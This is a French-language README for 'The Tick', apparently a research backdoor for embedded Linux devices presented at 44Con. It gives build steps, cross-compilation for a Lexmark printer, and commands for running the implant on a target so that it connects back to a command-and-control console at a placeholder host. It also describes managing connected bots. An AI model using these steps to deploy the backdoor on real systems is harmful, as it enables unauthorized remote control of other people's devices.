
A simple embedded Linux backdoor.
Une simple backdoor Linux embarquée.

The Tick ne dépend que de libcurl, assurez-vous donc de disposer du paquet de développement correspondant. Par exemple, sur les distributions basées sur Debian, vous feriez ce qui suit :
sudo apt-get install libcurl-dev
Une fois les dépendances installées, lancez simplement le makefile :
cd src
make clean
make
Une fois la commande « make » terminée, le binaire compilé se trouve dans le dossier « bin ». C'est ce binaire que vous devez exécuter sur la machine cible pour la contrôler à distance.
Lors de la compilation croisée pour les plateformes prises en charge, la résolution des dépendances et la compilation sont effectuées automatiquement pour vous. Actuellement, la seule plateforme de compilation croisée prise en charge est l'imprimante Lexmark CX310DN, mais d'autres appareils seront ajoutés ultérieurement. Consultez le makefile pour plus de détails.
La console de commande et de contrôle est écrite en Python et n'a donc pas besoin d'être compilée.
L'obtention d'une persistance sur la backdoor dépend fortement de la plateforme cible et n'est donc pas documentée ici.
Sur la machine cible, exécutez le binaire de la backdoor avec les arguments suivants :
./ticksvc ADDR PORT
« ADDR » et « PORT » doivent être remplacés par l'adresse IP et le port sur lesquels la console de commande et de contrôle écoutera. Le port par défaut est 5555.
La console de commande et de contrôle ne nécessite aucune installation, mais peut avoir des dépendances non résolues. Exécutez la commande suivante pour vous assurer que toutes les dépendances sont correctement installées (notez que cela ne nécessite pas sudo) :
pip install --upgrade -r requirements.txt
Dans la plupart des environnements de bureau Linux, le fichier « Tick.desktop » suivant créera une icône que vous pourrez double-cliquer pour lancer la console :
[Desktop Entry]
Encoding=UTF-8
Value=1.0
Type=Application
Name=The Tick
GenericName=The Tick
Comment=An embedded Linux backdoor
Icon=/opt/thetick/doc/logo.png
Exec=/opt/thetick/tick.py
Terminal=true
Path=/opt/thetick/
L'emplacement exact du fichier Tick.desktop peut varier selon les distributions Linux, mais le placer sur le bureau devrait généralement fonctionner. Assurez-vous de modifier le chemin vers l'endroit où vous avez téléchargé The Tick (/opt/thetick dans l'exemple ci-dessus).
Pour exécuter le binaire de la backdoor sur la plateforme cible, définissez le nom d'hôte et le port du serveur de contrôle comme options de ligne de commande. Par exemple :
./ticksvc control.example-domain.com 5555
Sur le serveur de contrôle, vous pouvez exécuter la console dans une instance GNU screen ou similaire :
sudo apt-get install screen
screen -S thetick ./thetick.py
Ainsi, vous pouvez vous détacher de la console en appuyant sur Control+A suivi de D. Vous pouvez revenir à la console plus tard comme ceci :
screen -r thetick
La console vous informera lorsqu'un nouveau bot s'y connecte. Utilisez la commande « bots » pour afficher les bots actuellement connectés, et la commande « use » pour sélectionner un bot avec lequel travailler. La commande « help » affiche le manuel de l'utilisateur.
Voici quelques captures d'écran illustrant ce dont la console est capable :


The Tick a été mentionné dans la présentation suivante de la 44Con par Daniel Romero et Mario Rivas :